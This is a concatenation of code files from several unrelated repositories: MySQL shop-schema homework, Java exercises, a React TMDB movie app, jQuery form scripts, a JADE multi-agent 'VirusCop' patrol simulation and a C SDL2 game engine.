('Gigabyte H310M S2H', 'Материнская плата Gigabyte H310M S2H, H310, Socket 1151-V2, DDR4, mATX', 4790.00, 2),
('MSI B250M GAMING PRO', 'Материнская плата MSI B250M GAMING PRO, B250, Socket 1151, DDR4, mATX', 5060.00, 2);
-- Orders: one row per order, indexed by customer.
DROP TABLE IF EXISTS orders;
CREATE TABLE orders (
id SERIAL PRIMARY KEY,
user_id INT UNSIGNED,
created_at DATETIME DEFAULT CURRENT_TIMESTAMP,
updated_at DATETIME DEFAULT CURRENT_TIMESTAMP ON UPDATE CURRENT_TIMESTAMP,
KEY index_of_user_id(user_id)
) COMMENT = 'Заказы';
-- Order line items: order <-> product many-to-many with a quantity.
DROP TABLE IF EXISTS orders_products;
CREATE TABLE orders_products (
id SERIAL PRIMARY KEY,
order_id INT UNSIGNED,
product_id INT UNSIGNED,
total INT UNSIGNED DEFAULT 1 COMMENT 'Количество заказанных товарных позиций',
created_at DATETIME DEFAULT CURRENT_TIMESTAMP,
updated_at DATETIME DEFAULT CURRENT_TIMESTAMP ON UPDATE CURRENT_TIMESTAMP
) COMMENT = 'Состав заказа';
-- Per-user / per-product discounts with an optional validity window.
DROP TABLE IF EXISTS discounts;
CREATE TABLE discounts (
id SERIAL PRIMARY KEY,
user_id INT UNSIGNED,
product_id INT UNSIGNED,
discount FLOAT UNSIGNED COMMENT 'Величина скидки от 0.0 до 1.0',
started_at DATETIME,
finished_at DATETIME,
created_at DATETIME DEFAULT CURRENT_TIMESTAMP,
updated_at DATETIME DEFAULT CURRENT_TIMESTAMP ON UPDATE CURRENT_TIMESTAMP,
KEY index_of_user_id(user_id),
KEY index_of_product_id(product_id)
) COMMENT = 'Скидки';
-- Warehouses and their per-product stock levels.
DROP TABLE IF EXISTS storehouses;
CREATE TABLE storehouses (
id SERIAL PRIMARY KEY,
name VARCHAR(255) COMMENT 'Название',
created_at DATETIME DEFAULT CURRENT_TIMESTAMP,
updated_at DATETIME DEFAULT CURRENT_TIMESTAMP ON UPDATE CURRENT_TIMESTAMP
) COMMENT = 'Склады';
DROP TABLE IF EXISTS storehouses_products;
CREATE TABLE storehouses_products (
id SERIAL PRIMARY KEY,
storehouse_id INT UNSIGNED,
product_id INT UNSIGNED,
value INT UNSIGNED COMMENT 'Запас товарной позиции на складе',
created_at DATETIME DEFAULT CURRENT_TIMESTAMP,
updated_at DATETIME DEFAULT CURRENT_TIMESTAMP ON UPDATE CURRENT_TIMESTAMP
) COMMENT = 'Запасы на складе';
-- Practice: data aggregation

-- 1. Average age of users.
-- TIMESTAMPDIFF(YEAR, ...) counts completed years, which is the usual "age"
-- semantics; the previous /365.25 approximation drifted around birthdays.
SELECT round(avg(timestampdiff(year, birthday_at, now())))
as averageage from users;

-- 2. Count birthdays per weekday, using the CURRENT year's weekday rather
-- than the weekday of the birth year (birthday shifted to this year).
select
dayname(concat(year(now()), '-', substring(birthday_at, 6, 10))) as birthdayonweekthisyear,
COUNT(*) AS amount_of_birthdays
from users
group by birthdayonweekthisyear
order by amount_of_birthdays desc;
-- NOTE(review): a Feb-29 birthday produces an invalid date (NULL weekday)
-- in non-leap years — confirm whether that edge case matters here.

-- 3. Product of the numbers in a column via exp(sum(log(x)));
-- NULL rows are ignored by SUM (and NULL into SERIAL auto-assigns an id).
drop table if exists numbers;
create table numbers(
id SERIAL PRIMARY KEY);
INSERT INTO numbers values
(1), (2), (3), (4), (NULL);
SELECT exp(sum(log(id))) from numbers;
<file_sep>-- јдминистрирование MySQL
-- 1. Create two users with access to the `shop` database:
--    shop_read may only run read (SELECT) queries; shop may perform any
--    operation within the shop database.
use shop;
drop user if exists 'shop'@'localhost';
create user 'shop'@'localhost';
-- WITH GRANT OPTION is the standard way to let `shop` re-grant its
-- privileges (replaces the non-standard "grant grant option on" form).
grant all on shop.* to 'shop'@'localhost' with grant option;
create user if not exists 'shop_read'@'localhost';
grant select on shop.* to 'shop_read'@'localhost';
| 4e87c90797f80c7b079ea860b1b2081338a751a7 | [
"SQL"
] | 12 | SQL | sofo4ka/MySQL_Homework | f2b6991b8c7fdb2d43a39baeb92e879917443c15 | c112ae07eccf0304ae226d75dccd66c7d7df5111 |
refs/heads/master | <file_sep>
public class StringsAndCharacters {
public static void main(String[] args) {
String doubleLetter = "Wellcome";
System.out.println(removeDoubledLetters(doubleLetter));
}
public static String removeDoubledLetters(String line) {
String newLine = "";
for(int i = 0; i < line.length(); i++) {
char ch = line.charAt(i);
if(i == 0 || ch != line.charAt(i-1)) {
newLine += ch;
}
}
return newLine;
}
}<file_sep>import stanford.karel.*;
public class BorderKarel extends SuperKarel {
public void run() {
turnLeft();
move();
turnRight();
for(int i = 0; i < 4; i ++) {
drawRow();
}
}
public void drawRow() {
move();
while(noBeepersPresent() == true) {
if(frontIsBlocked() == true) break;
putBeeper();
move();
}
turnAround();
move();
turnRight();
}
} | 6c2cd26e6c647bd0e597a106650c6b6c051a9795 | [
"Java"
] | 2 | Java | Squyres/Midterm_Stanford | ddc3cd440f5b6e4b5cc7c26a4efaaf31cd93e286 | 83b5e436b4063ab85b767563f0d0ecda52aa6d0c |
refs/heads/main | <repo_name>rkwantify/msk-movie-app<file_sep>/README.md
# Getting Started
* Run `yarn start` and navigate your browser to [http://localhost:3000](http://localhost:3000)
* API key is hardcoded for convenience
* This project was bootstrapped with [Create React App](https://github.com/facebook/create-react-app). Please see CRA-README.md for more details.
# Tech Stack
* React, TypeScript, React Router, React Hooks and Context API, CSS
* _debounce from lodash
# Features
# TODO
* Complete styling for modal
* Implement pagination for API calls
* Use custom hook to abstract away repetitive API logic from presentational components
* Implement tests
* Rename some components and variables
<file_sep>/src/api/api.ts
const BASE_API_URL = 'https://api.themoviedb.org/3';
const BASE_IMAGE_URL = 'https://image.tmdb.org/t/p/';
// const API_KEY = process.env.REACT_APP_TMDB_API_KEY;
const API_KEY = '<KEY>';

// Builds a full TMDB endpoint URL: base + path + api_key + any extra params.
const generateURL = (path: string, params = {}) => {
  const searchParams = new URLSearchParams({ api_key: `${API_KEY}`, ...params });
  return `${BASE_API_URL}${path}?${searchParams.toString()}`;
};
// Movie details plus cast in a single request (credits appended).
export const getMovieDetailsAndCast = (id: number | undefined) => {
  return generateURL(`/movie/${id}`, { append_to_response: 'credits' });
};

// Full-text movie search.
export const searchMovies = (searchQuery: string) => {
  return generateURL(`/search/movie`, { query: searchQuery });
};

// Poster image URL at width 185px. posterPath from TMDB already starts with
// '/' and BASE_IMAGE_URL ends with '/', so no extra separator is added here
// (the previous version produced a double slash: ".../t/p//w185...").
export const getMoviePoster = (posterPath: string) => {
  return `${BASE_IMAGE_URL}w185${posterPath}`;
};

export const getUpcomingMovies = () => {
  return generateURL('/movie/upcoming');
};

export const getPopularMovies = () => {
  return generateURL('/movie/popular');
};

// Cast/crew credits for a single movie.
export const getMovieCast = (id: number | undefined) => {
  return generateURL(`/movie/${id}/credits`);
};
| 39ab4134fab130bfaa92015a68cb7f5e06d2efcc | [
"Markdown",
"TypeScript"
] | 2 | Markdown | rkwantify/msk-movie-app | 0c0e2e93f6491de77263ecbf5b581fb456f84a21 | 9a7df9d43099277d89184ee5aec78948816ff542 |
refs/heads/master | <file_sep>
// Attach jQuery-validate to a form and flag invalid fields' containers.
// Defined at top level (NOT inside the ready callback): the second
// $(document).ready block below calls this function, and the original
// nested definition was out of scope there, throwing a ReferenceError.
function setFormValidation(id) {
  $(id).validate({
    errorPlacement: function(error, element) {
      $(element).parent('div').addClass('has-error');
    }
  });
}

$(document).ready(function() {
  demo.initFormExtendedDatetimepickers();
  demo.initMaterialWizard();
});
$(document).ready(function() {
  // Wire up validation for every form on the page, then init the sliders.
  ['#RegisterValidation', '#TypeValidation', '#LoginValidation', '#RangeValidation']
    .forEach(function(formId) {
      setFormValidation(formId);
    });
  md.initSliders();
});
$(function() {
  // Autocomplete source for the state fields.
  // Fixed the "Deleware" -> "Delaware" typo from the original list.
  // NOTE(review): "Canada", "District of Columbia" and "Puerto Rico" are not
  // US states — confirm whether they are intentionally included.
  var states = [
    "Alabama",
    "Alaska",
    "Arizona",
    "Arkansas",
    "California",
    "Canada",
    "Colorado",
    "Connecticut",
    "Delaware",
    "District of Columbia",
    "Florida",
    "Georgia",
    "Hawaii",
    "Idaho",
    "Illinois",
    "Indiana",
    "Iowa",
    "Kansas",
    "Kentucky",
    "Louisiana",
    "Maine",
    "Maryland",
    "Massachusetts",
    "Michigan",
    "Minnesota",
    "Mississippi",
    "Missouri",
    "Montana",
    "Nebraska",
    "Nevada",
    "New Hampshire",
    "New Jersey",
    "New Mexico",
    "New York",
    "North Carolina",
    "North Dakota",
    "Ohio",
    "Oklahoma",
    "Oregon",
    "Pennsylvania",
    "Puerto Rico",
    "Rhode Island",
    "South Carolina",
    "South Dakota",
    "Tennessee",
    "Texas",
    "Utah",
    "Vermont",
    "Virginia",
    "Washington",
    "West Virginia",
    "Wisconsin",
    "Wyoming",
  ];
  $( "#automplete-states, #states2" ).autocomplete({
    source: states,
    autoFocus: true
  });
});
$(function() {
// Autocomplete source for the skill fields (cannabis-industry job skills,
// sorted alphabetically with a catch-all "Other" entry at the end).
var skills = [
"Accounting",
"Administration",
"BioTrackTHC",
"Budtender",
"Business Development",
"Chemistry",
"Communication",
"Computer Programming",
"Consulting",
"Creativity",
"Culinary",
"Customer Service",
"Entrepreneurship",
"Event Planning",
"Extraction",
"Finance",
"Flow Hub",
"Growing",
"Health Care",
"Horticulture",
"Human Resources",
"Inventory",
"Investments",
"Leadership",
"Legal",
"Marketing",
"Metric",
"MIPS",
"MJfreeway",
"MMJMenu",
"Motivated",
"Multi-Tasking",
"Networking",
"Organizational Skills",
"Packaging",
"Pak",
"PakArab",
"Presentation Skills",
"Public Relations",
"Reliability",
"Sales",
"Security",
"Social Media",
"Strain Knowledge",
"Teamwork",
"Time Managment",
"Trimming",
"Writing",
"Other",
];
// Same skill list backs all three skill inputs.
$( "#automplete-skills, #skills2, #skills3" ).autocomplete({
source: skills,
autoFocus:true
});
});
$(function() {
// Autocomplete source for the month field (English month names, in
// calendar order).
var month = [
"January",
"February",
"March",
"April",
"May",
"June",
"July",
"August",
"September",
"October",
"November",
"December"
];
$( "#automplete-month" ).autocomplete({
source: month,
autoFocus:true
});
});
$(function() {
  // Autocomplete source for the year field: "2017" through "2030" inclusive,
  // generated instead of hand-written (same string values as before).
  var year = [];
  for (var y = 2017; y <= 2030; y++) {
    year.push(String(y));
  }
  $( "#automplete-year" ).autocomplete({
    source: year,
    autoFocus: true
  });
});
$(document).ready(function() {
// Initialize the main DataTable with full pagination, page-size choices
// (including "All" = -1), responsive layout and a styled search box.
$('#datatables').DataTable({
"pagingType": "full_numbers",
"lengthMenu": [
[10, 25, 50, -1],
[10, 25, 50, "All"]
],
responsive: true,
language: {
search: "_INPUT_",
searchPlaceholder: "Search records",
}
});
var table = $('#datatables').DataTable();
// Edit record
table.on('click', '.edit', function() {
$tr = $(this).closest('tr');
var data = table.row($tr).data();
alert('You press on Row: ' + data[0] + ' ' + data[1] + ' ' + data[2] + '\'s row.');
});
// Delete a record
table.on('click', '.remove', function(e) {
$tr = $(this).closest('tr');
table.row($tr).remove().draw();
e.preventDefault();
});
//Like record
table.on('click', '.like', function() {
alert('You clicked on Like button');
});
// Give the DataTables search/length labels Bootstrap form styling.
$('.card .material-datatables label').addClass('form-group');
});
"JavaScript"
] | 1 | JavaScript | molson303/V_dashboard | 27910bfb57eb9ffca5aa901a4e97aba945a89af2 | e1aa902ce919cc3bd03743d5c1294004efd1180c |
refs/heads/master | <file_sep>package ma.ensias.VirusCop.util;
import jade.core.ProfileImpl;
import jade.util.ExtendedProperties;
import jade.util.leap.Properties;
import jade.wrapper.ContainerController;
import jade.core.Runtime;
public class Plateforme{
	// The main container (set only when isMain) or the peripheral container.
	private ContainerController mainContainer, aContainer;
	// NOTE(review): these two fields are never assigned or read — the
	// constructor uses its parameters directly; they look like dead code.
	private boolean isMain;
	private String name;

	/**
	 * Creates a JADE container.
	 *
	 * @param isMain when true, starts the platform's main container with the
	 *               management GUI; otherwise creates a peripheral container
	 *               attached to the main container running on localhost.
	 * @param name   container name (used only for peripheral containers).
	 */
	public Plateforme(boolean isMain, String name) {
		if(isMain) {
			Runtime rt = Runtime.instance();
			Properties p = new ExtendedProperties() ; // set a few platform properties
			p.setProperty("gui","true") ;
			ProfileImpl profile = new ProfileImpl(p);
			mainContainer = rt.createMainContainer(profile); // create the main container
		}else {
			Runtime rt = Runtime.instance() ;
			ProfileImpl profile = new ProfileImpl(false);
			// The associated main container is already started on localhost
			profile.setParameter(ProfileImpl.MAIN_HOST, "localhost");
			profile.setParameter(ProfileImpl.CONTAINER_NAME, name);
			aContainer = rt.createAgentContainer(profile);
		}
	}
public ContainerController getMainContainer(){return mainContainer;}
public ContainerController getAContainer(){return aContainer;}
}<file_sep>package ma.ensias.VirusCop.behaviours;
import java.util.List;
import jade.core.Agent;
import jade.core.ContainerID;
import jade.core.behaviours.TickerBehaviour;
/**
 * Ticker behaviour that moves a cop agent one container further along its
 * itinerary on every tick; the agent deletes itself after the last stop.
 */
public class MovingCopBehaviour extends TickerBehaviour {

	/** Ordered container names the agent must visit. */
	protected List<String> itinerary;
	/** Index of the next container to move to (starts at the root/station). */
	protected int nodeStep = 0;
	// The unused `private int period` field was removed: it was never
	// assigned — the constructor's period parameter only feeds the super ctor.

	public MovingCopBehaviour(Agent a, List<String> itinerary, int period) {
		super(a, period);
		this.itinerary = itinerary;
	}

	@Override
	protected void onTick() {
		// Guard against an empty itinerary or a spurious extra tick after the
		// agent has already scheduled its own deletion.
		if (nodeStep >= itinerary.size()) {
			getAgent().doDelete();
			return;
		}
		System.out.println(itinerary.get(nodeStep));
		ContainerID cid = new ContainerID();
		cid.setName(itinerary.get(nodeStep));
		cid.setAddress("localhost");
		getAgent().doMove(cid);
		// The tour ends once the last stop has been reached.
		if (nodeStep + 1 == itinerary.size()) {
			getAgent().doDelete();
		}
		nodeStep++;
	}
}
<file_sep>package ma.ensias.VirusCop.agents;
import java.util.List;
import jade.content.lang.sl.SLCodec;
import jade.content.onto.basic.Action;
import jade.content.onto.basic.Result;
import jade.core.AID;
import jade.core.Agent;
import jade.core.ContainerID;
import jade.core.behaviours.CyclicBehaviour;
import jade.core.behaviours.TickerBehaviour;
import jade.domain.FIPANames;
import jade.domain.JADEAgentManagement.JADEManagementOntology;
import jade.domain.JADEAgentManagement.QueryAgentsOnLocation;
import jade.lang.acl.ACLMessage;
import jade.lang.acl.MessageTemplate;
import jade.wrapper.AgentController;
import jade.wrapper.ControllerException;
import ma.ensias.VirusCop.behaviours.MovingCopBehaviour;
import ma.ensias.VirusCop.behaviours.SearchAndKillBehaviour;
import ma.ensias.VirusCop.util.utils;
/**
 * Mobile police agent: migrates along an itinerary of containers while a
 * cyclic behaviour scans each one for the intruder agent.
 */
public class MobileCop extends Agent {

	// Ordered container names the agent will visit.
	protected List<String> itinerary;
	protected int nodeStep = 0; // Starting with stationContainer;
	// Tick period (ms) forwarded to the moving behaviour.
	private int period;

	protected void setup() {
		// DEFINE ONTOLOGY & FIPA CODEC NORM.
		getContentManager().registerOntology(JADEManagementOntology.getInstance());
		getContentManager().registerLanguage(new SLCodec(), FIPANames.ContentLanguage.FIPA_SL0);

		// Startup arguments: [0] itinerary, [1] tick period.
		Object[] args = getArguments();
		itinerary = (List<String>) args[0];
		period = (int) args[1];
		System.out.println("Agent MobileCop cree : " + getLocalName());
		// MOBILE COP AGENT IS MOVING THROUGH ITINERARY, SEARCHING FOR THE INTRUDER. ENDING ITS ITINERARY WITH ROOT.
		addBehaviour(new MovingCopBehaviour(this, itinerary, period));
		// CYCLICBEHAVIOUR SCAN TO SEARCH THE INTRUDER AGENT, AND KILL IT IF EXISTS.
		addBehaviour(new SearchAndKillBehaviour(this));
	}

	// Agent termination hook: the cop finished its tour and is destroyed.
	protected void takeDown() {
		System.out.println("Agent MobileCop a fait le tour est detruit : "+getLocalName());
	}

	protected void beforeMove() {
	}

	// Runs in the destination container after each migration; the ontology
	// and codec are re-registered here (mirroring setup) — presumably because
	// the registrations do not survive migration; confirm against JADE docs.
	protected void afterMove() {
		try {
			getContentManager().registerOntology(JADEManagementOntology.getInstance());
			getContentManager().registerLanguage(new SLCodec(), FIPANames.ContentLanguage.FIPA_SL0);
			System.out.println("Agent ("+getLocalName()+") arrivée : "+getContainerController().getContainerName());
		} catch (ControllerException e) {
			// getContainerName() declares ControllerException; just log it.
			e.printStackTrace();
		}
	}
}
<file_sep>package ma.ensias.VirusCop.agents;
import java.util.List;
import jade.content.lang.sl.SLCodec;
import jade.content.onto.basic.Action;
import jade.content.onto.basic.Result;
import jade.core.AID;
import jade.core.Agent;
import jade.core.ContainerID;
import jade.core.behaviours.CyclicBehaviour;
import jade.core.behaviours.TickerBehaviour;
import jade.domain.FIPANames;
import jade.domain.JADEAgentManagement.JADEManagementOntology;
import jade.domain.JADEAgentManagement.QueryAgentsOnLocation;
import jade.lang.acl.ACLMessage;
import jade.lang.acl.MessageTemplate;
import jade.wrapper.AgentController;
import jade.wrapper.ControllerException;
import jade.wrapper.StaleProxyException;
import ma.ensias.VirusCop.behaviours.RespawnCopBehaviour;
import ma.ensias.VirusCop.behaviours.StationScanRootBehaviour;
import ma.ensias.VirusCop.main.Main;
/**
 * Stationary police agent: watches the root container for the intruder and
 * periodically respawns mobile cops to patrol the rest of the platform.
 */
public class FixCop extends Agent {

	protected void setup() {
		// The management ontology and FIPA-SL0 codec are needed for the
		// agent-query/kill messages used by the behaviours below.
		getContentManager().registerOntology(JADEManagementOntology.getInstance());
		getContentManager().registerLanguage(new SLCodec(), FIPANames.ContentLanguage.FIPA_SL0);

		System.out.println("Agent FixCop cree : "+getLocalName());

		// Startup arguments: [0] patrol itinerary, [1] respawn period.
		Object[] startupArgs = getArguments();
		List<String> patrolRoute = (List<String>) startupArgs[0];
		int respawnPeriod = (int) startupArgs[1];

		// Kill the intruder on sight whenever it appears in the root container.
		addBehaviour(new StationScanRootBehaviour(this));
		// Spawn a fresh mobile cop each time the previous one's lifetime elapses.
		addBehaviour(new RespawnCopBehaviour(this, respawnPeriod, patrolRoute));
	}
}
| fdf7f83ab76ae77a285bac99e887098212468d49 | [
"Java"
] | 4 | Java | NabilRM/SMA-Project | 3466deab579ca9e071d9db4f7381ce8f4b1307aa | 2bc66098f4cb33ac87bd236691f565830220b47c |
refs/heads/master | <file_sep>#pragma once
// Lifecycle hooks implemented by the game layer and driven by the engine:
// main() calls game_init after engine_init, the fixed-timestep loop calls
// game_update, and game_cleanup runs before engine_cleanup.
void game_init(void);
void game_update(void);
void game_cleanup(void);
void game_render(void);<file_sep>#include <stdlib.h>
#include <string.h>
#include "component.h"
#include "hash.h"
// Allocate an empty component store able to hold `length` components.
// Every hashmap slot starts at -1, meaning "no component for this hash".
Component_Type init_component_type(int length)
{
    Component_Type store;
    store.data = (void**)malloc(sizeof(void*) * length);
    store.hashmap = (int*)malloc(sizeof(int) * length);
    store.length = length;
    store.real_length = 0;
    int slot = 0;
    while(slot < length)
    {
        store.hashmap[slot] = -1;
        slot++;
    }
    return store;
}
// Append `component_data` for `entity_id`: store it in the next free dense
// slot and point the entity's hash slot at that index.
// NOTE(review): there is no capacity check (real_length can run past length),
// and a hash collision silently overwrites the colliding entity's mapping —
// both look like latent bugs to confirm with the author.
void add_component(Component_Type *component_type, void *component_data, int entity_id)
{
    component_type->data[component_type->real_length] = component_data;
    component_type->hashmap[hash(entity_id, component_type->length)] = component_type->real_length;
    component_type->real_length++;
}
// Remove the component mapped to `entity_id`, keeping `data` dense by moving
// the last component into the freed slot (swap-with-last removal).
void remove_component(Component_Type *component_type, int entity_id)
{
    int hash_result = hash(entity_id, component_type->length);
    int slot = component_type->hashmap[hash_result];
    // Unknown entity (or double remove): leave the store untouched.
    if(slot == -1)
    {
        return;
    }
    int last = component_type->real_length - 1;
    // Fixes two bugs in the original: it indexed `data` with the raw hash
    // instead of the mapped dense slot, and it read data[real_length], one
    // element past the last live entry (add_component increments after storing).
    component_type->data[slot] = component_type->data[last];
    component_type->data[last] = NULL;
    component_type->hashmap[hash_result] = -1;
    component_type->real_length--;
    // TODO(review): the hashmap entry of the component moved from `last`
    // still points at its old index; fully fixing that needs the moved
    // component's entity id, which is only reachable behind the void*.
}
// Look up the component stored for `entity_id`; NULL when nothing is mapped.
void *get_component(Component_Type *component_type, int entity_id)
{
    int slot = component_type->hashmap[hash(entity_id, component_type->length)];
    if(slot == -1)
    {
        return NULL;
    }
    return component_type->data[slot];
}<file_sep>#pragma once
#include "../../component.h"
#include "collision_info.h"
// Axis-aligned rectangular collider attached to an entity.
typedef struct
{
    int entity_id;   // owning entity
    int x, y;        // box position — relative frame not shown here; confirm
    int w, h;        // box size
    int is_trigger;  // presumably overlap-only (no blocking) — TODO confirm
} Box_Collider;
Collision_Info box_collision(Component_Type *colliders, Component_Type *position, Box_Collider *active_collider,
int move_x, int move_y, unsigned int collision_ids_length);<file_sep>#pragma once
#include <SDL2/SDL.h>
#include <stdio.h>
// Keyboard snapshots for the previous and current frame, used to derive
// pressed / held / released transitions.
// NOTE(review): these are object definitions in a header — every .c file
// including this header gets its own definition, which fails to link with
// modern toolchains (-fno-common). They should be `extern` here, with one
// definition in a .c file.
Uint8 input_previous_keyboard_state[512];
Uint8 input_current_keyboard_state[512];
const Uint8 *input_keyboard_state_pointer; // SDL's live keyboard state array
int input_get_key_down(SDL_Scancode scancode); // pressed this frame
int input_get_key(SDL_Scancode scancode);      // currently held
int input_get_key_up(SDL_Scancode scancode);   // released this frame
// Binding of a logical input name (e.g. "jump") to a concrete scancode,
// enabling rebinding and alternative input methods.
typedef struct
{
    SDL_Scancode scancode;
    char *input_name;
} Game_Input;
Game_Input *game_inputs;   // active binding table (same header-definition caveat)
int number_of_game_inputs; // number of entries in game_inputs
SDL_Scancode scancode_from_gi(const char *input_name, Game_Input *inputs, int length);
int get_input_down(const char *input_name);
int get_input(const char *input_name);
int get_input_up(const char *input_name);<file_sep>#pragma once
#include <SDL2/SDL.h>
#include "input.h"
// NOTE(review): object definitions in a header (window, renderer, and
// `running` just below) break linking when included from multiple .c files
// with -fno-common toolchains; they should be extern-declared here and
// defined once in engine.c.
SDL_Window *window;     // the single application window
SDL_Renderer *renderer; // renderer bound to `window`
double read_timer_dt(void); // last frame's variable delta, in seconds
int engine_init(void);      // returns 0 on success, 1 on failure
void engine_cleanup(void);
void loop(void);            // blocks until `running` is cleared
int running;<file_sep>#pragma once
//#include "box_collider.h"
#include "../../component.h"
#include "collision_info.h"
// Tile-grid collider: a 2D grid of cells, with per-cell ids whose collision
// semantics are defined by grid_collision().
typedef struct
{
    int entity_id;            // owning entity
    unsigned int grid_width;  // grid size, in cells
    unsigned int grid_height;
    unsigned int cell_width;  // cell size — presumably pixels; confirm
    unsigned int cell_height;
    int *collision_ids;       // one id per cell — layout/ownership not shown here
} Grid_Collider;
Collision_Info grid_collision(Component_Type *grid_collider, Component_Type *position,
Box_Collider *box_collider, int move_x, int move_y);<file_sep>#pragma once
#include "../../component.h"
#include "sprite.h"
// Tile map rendered from a single sprite sheet.
typedef struct
{
    int entity_id;          // owning entity
    unsigned int map_width; // map size — presumably in tiles; confirm
    unsigned int map_height;
    int *sprite_ids;        // per-tile sprite indices (layout not shown here)
    Sprite *sprite;         // sprite sheet the indices refer to
} Tilemap;
void render_tilemap(Component_Type *cmp_type, Component_Type *pos);<file_sep>EXEC = game.app
CC = gcc
EXTENSION = c
SRCS_DIR = src
# SDL2 library names are case-sensitive on Linux (libSDL2*.so), so link
# with -lSDL2, not -lsdl2.
LFLAGS += -lm -lSDL2 -lSDL2_image -lSDL2_ttf
# Quote the -name pattern so the shell does not glob-expand it prematurely.
SRCS = $(shell find $(SRCS_DIR) -type f -name '*.$(EXTENSION)')

.PHONY: all run

all:
	$(CC) $(SRCS) -o $(EXEC) $(LFLAGS)

run:
./$(EXEC)<file_sep>#include "input.h"
// Returns true if the key transitioned to pressed this frame.
int input_get_key_down(SDL_Scancode scancode)
{
    // Down now but not on the previous frame == a fresh key-down edge.
    return input_current_keyboard_state[scancode]
        && !input_previous_keyboard_state[scancode];
}
// Returns true if the key is currently held down.
int input_get_key(SDL_Scancode scancode)
{
    return input_current_keyboard_state[scancode] != 0;
}
// Returns true if the key transitioned to released this frame.
int input_get_key_up(SDL_Scancode scancode)
{
    // Up now but down on the previous frame == a release edge.
    return !input_current_keyboard_state[scancode]
        && input_previous_keyboard_state[scancode];
}
// The following functions provide a layer of abstraction that allows for
// keybinding and alternative input methods (controllers).

// Content comparison of two NUL-terminated strings (avoids needing <string.h>).
static int gi_names_equal(const char *a, const char *b)
{
    while(*a != '\0' && *a == *b)
    {
        a++;
        b++;
    }
    return *a == *b;
}

// Resolves a logical input name to its bound scancode.
// The original compared the char POINTERS with ==, which only matches when
// both sides are the same string object (e.g. the identical literal);
// comparing contents makes lookups work for any equal string. It also
// returned NULL (a pointer) for a missing binding — SDL_SCANCODE_UNKNOWN is
// the correctly-typed "no key" value.
SDL_Scancode scancode_from_gi(const char *input_name, Game_Input *inputs, int length)
{
    for(int i = 0; i < length; i++)
    {
        if(gi_names_equal(inputs[i].input_name, input_name))
        {
            return inputs[i].scancode;
        }
    }
    return SDL_SCANCODE_UNKNOWN;
}
int get_input_down(const char *input_name)
{
    // Translate the logical name to a scancode, then test the press edge.
    return input_get_key_down(scancode_from_gi(input_name, game_inputs, number_of_game_inputs));
}
int get_input(const char *input_name)
{
    // Translate the logical name to a scancode, then test the held state.
    return input_get_key(scancode_from_gi(input_name, game_inputs, number_of_game_inputs));
}
int get_input_up(const char *input_name)
{
    // Translate the logical name to a scancode, then test the release edge.
    return input_get_key_up(scancode_from_gi(input_name, game_inputs, number_of_game_inputs));
}<file_sep>int hash(int key, int array_length)
{
    // Knuth multiplicative hash; 2654435769 ~= 2^32 / golden ratio.
    // Unsigned 64-bit math makes the product and shift well defined on every
    // platform (the original used `long`, which is 32 bits on some ABIs and
    // overflowed), and the unsigned cast of `key` keeps the result
    // non-negative, so it is always a valid index 0..array_length-1 (the
    // original could return a negative index for negative keys).
    unsigned long long product = (unsigned int)key * 2654435769ULL;
    return (int)((product >> 32) % (unsigned int)array_length);
}<file_sep>#pragma once
// Result of a collision query.
typedef struct
{
    // Movement actually allowed after the requested move was resolved
    // against whatever was hit.
    int modified_move_x;
    int modified_move_y;
    int *collided_ids; // ids of things hit — ownership/length not shown here; confirm
} Collision_Info;<file_sep>#pragma once
// Health component.
typedef struct
{
    // NOTE(review): "enitity_id" is a typo for entity_id, but renaming the
    // field would break any (unseen) code that uses it — fix repo-wide.
    int enitity_id;
    int hp; // current hit points
} Health;<file_sep>#include <stdio.h>
#include "engine.h"
#include "game.h"
// Article which explains time steps: https://gafferongames.com/post/fix_your_timestep/
static double timer_last;        // SDL_GetTicks() timestamp (ms) of the previous frame
static double timer_now;         // SDL_GetTicks() timestamp (ms) of the current frame
static double timer_dt;          // last frame's duration, in seconds
static double timer_fixed_dt;    // fixed simulation step, in seconds (1/60)
static double timer_accumulator; // unsimulated time carried between frames
double read_timer_dt(void) { return timer_dt; }
// Drains the SDL event queue and refreshes the keyboard snapshots.
// The previous frame's state is saved first so the input_* edge queries can
// compare current against previous.
// NOTE(review): the SDL_Event parameter is only used as scratch space for
// SDL_PollEvent — it could just as well be a local variable.
static void events(SDL_Event event)
{
    // Handle all events, making sure previous and current input states are updated properly
    memcpy(input_previous_keyboard_state, input_current_keyboard_state, 512);
    while(SDL_PollEvent(&event))
    {
        // Window close / quit request stops the main loop.
        if(event.type == SDL_QUIT)
        {
            printf("Quit\n");
            running = 0;
            break;
        }
    }
    memcpy(input_current_keyboard_state, input_keyboard_state_pointer, 512);
}
// One frame: clear the backbuffer, let the game draw, then present.
static void render(void)
{
    SDL_RenderClear(renderer);
    game_render();
    SDL_RenderPresent(renderer);
}
// Main loop: fixed-timestep simulation with variable-rate rendering.
// See https://gafferongames.com/post/fix_your_timestep/
void loop(void)
{
    timer_now = SDL_GetTicks();
    SDL_Event event;
    running = 1;
    while(running)
    {
        // (A leftover debug printf of SDL_GetError() was removed here — it
        // printed stale error text to stdout on every single frame.)
        timer_last = timer_now;
        timer_now = SDL_GetTicks();
        timer_dt = (timer_now - timer_last)/1000;
        timer_accumulator += timer_dt;
        // Run as many fixed updates as the elapsed time warrants so the
        // simulation advances at a constant rate regardless of render speed.
        while (timer_accumulator >= timer_fixed_dt)
        {
            events(event);
            game_update();
            timer_accumulator -= timer_fixed_dt;
        }
        render();
    }
}
// Initializes SDL, the window, the renderer and the frame timer.
// Returns 0 on success, 1 on failure. Partially-created resources are now
// released on the failure paths (the original leaked them).
int engine_init(void)
{
    int window_width = 2560;
    int window_height = 1440;
    int target_render_width = 256;
    int target_render_height = 144;
    // Init SDL. SDL_Init returns a negative error code on failure, not
    // necessarily -1, so test with < 0.
    if(SDL_Init(SDL_INIT_EVERYTHING) < 0)
    {
        printf("Failed to initialize SDL: %s\n", SDL_GetError());
        return 1;
    }
    // Create window
    window = SDL_CreateWindow("Game", SDL_WINDOWPOS_UNDEFINED, SDL_WINDOWPOS_UNDEFINED,
                            window_width, window_height, SDL_WINDOW_MAXIMIZED);
    if(window == NULL)
    {
        printf("Failed to create window: %s\n", SDL_GetError());
        SDL_Quit();
        return 1;
    }
    // Create renderer
    renderer = SDL_CreateRenderer(window, -1, 0);
    if(renderer == NULL)
    {
        printf("Failed to create renderer %s\n", SDL_GetError());
        SDL_DestroyWindow(window);
        SDL_Quit();
        return 1;
    }
    // Render at a fixed low resolution and let SDL integer-scale it up to
    // the window size (pixel-art friendly).
    SDL_RenderSetLogicalSize(renderer, target_render_width, target_render_height);
